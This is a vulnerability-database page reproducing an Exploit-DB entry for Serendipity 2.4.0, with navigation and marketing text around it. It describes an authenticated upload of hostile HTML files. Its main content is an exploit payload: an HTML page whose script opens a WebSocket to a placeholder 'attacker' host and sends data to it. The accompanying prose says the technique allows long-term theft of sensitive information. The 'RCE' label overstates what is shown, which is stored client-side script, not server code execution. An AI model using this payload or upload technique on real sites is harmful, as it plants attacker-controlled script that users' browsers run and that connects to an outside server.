Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Serendipity 2.4.0 - File Inclusion RCE

🗓️ 02 May 2023 00:00:00Reported by nu11secur1tyType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 278 Views

Serendipity 2.4.0 File Inclusion RCE, allows authenticated attacker to upload dangerous HTML files, leading to potential long-term data theft. Exploit includes WebSocket server to connect with malicious webserver. High vulnerability.

Code
## Exploit Title: Serendipity 2.4.0 - File Inclusion RCE
## Author: nu11secur1ty
## Date: 04.26.2023
## Vendor: https://docs.s9y.org/index.html
## Software: https://github.com/s9y/Serendipity/releases/tag/2.4.0
## Reference: https://portswigger.net/web-security/file-upload
## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload

## Description:
The already authenticated attacker can upload HTML files on the
server, which is absolutely dangerous and STUPID
In this file, the attacker can be codding a malicious web-socket
responder that can connect with some nasty webserver somewhere. It
depends on the scenario, the attacker can steal every day very
sensitive information, for a very long period of time, until the other
users will know that something is not ok with this system, and they
decide to stop using her, but maybe they will be too late for this
decision.

STATUS: HIGH Vulnerability

[+]Exploit:
```HTML
<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<title>NodeJS WebSocket Server</title>
</head>
<body>
	<h1>You have just sent a message to your attacker,<br>
	<h1>that you are already connected to him.</h1>
<script>
const ws = new WebSocket("ws://attacker:8080");
ws.addEventListener("open", () =>{
  console.log("We are connected to you");
  ws.send("How are you, dear :)?");
});

ws.addEventListener('message', function (event) {
    console.log(event.data);
});
</script>
</body>
</html>

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/s9y/2023/Serendipity-2.4.0)

## Proof and Exploit:
[href](https://streamable.com/2s80z6)

## Time spend:
01:27:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=nu11secur1ty <http://nu11secur1ty.com/>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 May 2023 00:00Current
7.4High risk
Vulners AI Score7.4
serendipityfile inclusionrceauthenticated attackhtmldata theftwebsocketexploitvulnerabilitywebserver
278